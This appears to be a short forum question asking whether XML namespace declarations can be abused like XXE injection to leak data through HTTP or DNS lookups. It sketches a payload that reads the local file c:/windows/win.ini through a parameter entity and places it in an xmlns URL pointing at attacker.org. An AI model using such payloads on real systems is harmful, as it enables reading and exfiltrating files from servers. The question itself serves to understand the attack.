I know about inserting external entities (XXE injection). But how about namespaces? Are there any attacks known? What's the difference? Would it be possible to insert some sensitive info in a HTTP/DNS lookup in the xmlns: part?
soap env:Envelope xmlns:soapenv="http://attacker.org/soap/envelope?<some_sentive_info>"
for example, !DOCTYPE updateProfile[!ENTITY % file SYSTEM "file:///c:/windows/win.ini"]
and later on: <soapenv:Envelope xmlns:soapenv="http://attacker.org/soap/envelope?%file;">